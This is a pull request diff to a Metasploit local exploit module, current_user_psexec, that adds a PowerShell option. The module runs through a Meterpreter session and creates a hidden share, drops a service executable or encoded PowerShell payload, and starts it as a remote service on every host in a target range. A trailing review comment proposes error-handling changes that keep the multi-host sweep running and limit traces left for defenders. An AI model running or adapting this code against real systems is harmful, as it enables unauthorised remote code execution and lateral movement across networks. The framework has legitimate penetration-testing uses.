Adds Powershell Technique to current_user_psexec #2404

merged 1 commit into from Sep 20, 2013
84 changes: 49 additions & 35 deletions modules/exploits/windows/local/current_user_psexec.rb
Expand Up @@ -18,6 +18,7 @@ class Metasploit3 < Msf::Exploit::Local
include Post::Common
include Post::Windows::Services
include Exploit::EXE
include Exploit::Powershell
include Post::File

def initialize(info={})
Expand All @@ -44,6 +45,10 @@ def initialize(info={})
[ 'OSVDB', '3106'],
[ 'URL', 'http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx' ]
],
'DefaultOptions' =>
{
'WfsDelay' => 10,
},
'DisclosureDate' => 'Jan 01 1999',
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ],
Expand All @@ -59,43 +64,47 @@ def initialize(info={})
]),
OptString.new("NAME", [ false, "Service name on each target in RHOSTS (Default: random)" ]),
OptString.new("DISPNAME", [ false, "Service display name (Default: random)" ]),
OptEnum.new("TECHNIQUE", [ true, "Technique to use", 'SMB', ['PSH', 'SMB'] ]),
OptAddressRange.new("RHOSTS", [ false, "Target address range or CIDR identifier" ]),
])
end

def exploit
name = datastore["NAME"] || Rex::Text.rand_text_alphanumeric(10)
display_name = datastore["DISPNAME"] || Rex::Text.rand_text_alphanumeric(10)

# XXX Find the domain controller

#share_host = datastore["INTERNAL_ADDRESS"] || detect_address
share_host = datastore["INTERNAL_ADDRESS"] || session.session_host
print_status "Using #{share_host} as the internal address for victims to get the payload from"

# Build a random name for the share and directory
share_name = Rex::Text.rand_text_alphanumeric(8)
drive = session.fs.file.expand_path("%SYSTEMDRIVE%")
share_dir = "#{drive}\\#{share_name}"

# Create them
print_status("Creating share #{share_dir}")
session.fs.dir.mkdir(share_dir)
cmd_exec("net share #{share_name}=#{share_dir}")

# Generate an executable from the shellcode and drop it in the share
# directory
filename = "#{Rex::Text.rand_text_alphanumeric(8)}.exe"
payload_exe = generate_payload_exe_service(
:servicename => name,
# XXX Ghetto
:arch => payload.send(:pinst).arch.first
)

print_status("Dropping payload #(unknown)")
write_file("#{share_dir}\\#(unknown)", payload_exe)

service_executable = "\\\\#{share_host}\\#{share_name}\\#(unknown)"
if datastore['TECHNIQUE'] == 'SMB'
# XXX Find the domain controller

#share_host = datastore["INTERNAL_ADDRESS"] || detect_address
share_host = datastore["INTERNAL_ADDRESS"] || session.session_host
print_status "Using #{share_host} as the internal address for victims to get the payload from"

# Build a random name for the share and directory
share_name = Rex::Text.rand_text_alphanumeric(8)
drive = session.fs.file.expand_path("%SYSTEMDRIVE%")
share_dir = "#{drive}\\#{share_name}"

# Create them
print_status("Creating share #{share_dir}")
session.fs.dir.mkdir(share_dir)
cmd_exec("net share #{share_name}=#{share_dir}")

# Generate an executable from the shellcode and drop it in the share
# directory
filename = "#{Rex::Text.rand_text_alphanumeric(8)}.exe"
payload_exe = generate_payload_exe_service(
:servicename => name,
# XXX Ghetto
:arch => payload.send(:pinst).arch.first
)

print_status("Dropping payload #(unknown)")
write_file("#{share_dir}\\#(unknown)", payload_exe)

service_executable = "\\\\#{share_host}\\#{share_name}\\#(unknown)"
else
service_executable = cmd_psh_payload(payload.encoded)
end

begin
Rex::Socket::RangeWalker.new(datastore["RHOSTS"]).each do |server|
Expand All @@ -113,18 +122,23 @@ def exploit

print_status("#{server.ljust(16)} Deleting the service")
service_delete(name, server)
rescue
rescue Rex::TimeoutError
vprint_status("#{server.ljust(16)} Timed out...")
next
rescue RuntimeError
print_error("Exception running payload: #{$!.class} : #{$!}")
print_warning("#{server.ljust(16)} WARNING: May have failed to clean up!")
print_warning("#{server.ljust(16)} Try a command like: sc \\\\#{server}\\ delete #{name}")
next
end
end
ensure
print_status("Deleting share #{share_name}")
cmd_exec("net share #{share_name} /delete /y")
print_status("Deleting files #{share_dir}")
cmd_exec("cmd /c rmdir /q /s #{share_dir}")
if datastore['TECHNIQUE'] == 'SMB'
print_status("Deleting share #{share_name}")
cmd_exec("net share #{share_name} /delete /y")
print_status("Deleting files #{share_dir}")
cmd_exec("cmd /c rmdir /q /s #{share_dir}")
end
end

end
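Review bot: Narrowing the per-host handler from a bare `rescue` to `rescue RuntimeError` (the hunk at `@@ -113,18 +122,23`) means any other StandardError raised by service_create/service_start/service_delete for one host — a Meterpreter request error, for instance, which as far as I recall is not a RuntimeError subclass — now escapes the RangeWalker loop, aborts the sweep for the remaining RHOSTS, and skips the "May have failed to clean up" warning, so a service named `name` can be left behind on that host without the operator being told. I would catch `rescue StandardError => e` after the Rex::TimeoutError branch and format the message from `e` rather than `$!`: `print_error("Exception running payload: #{e.class} : #{e}")`. The outer `ensure` still removes the share in the SMB case, so the risk is limited to the remote service, but that is the artifact a defender will find. Separately, the PSH branch hands a PowerShell command line to the SCM as the service binary; I'd expect the service to report a start failure or be killed once it fails to check in, which presumably is why WfsDelay was raised — a one-line comment on the `else` branch saying the payload must not depend on the service staying alive would help the next maintainer.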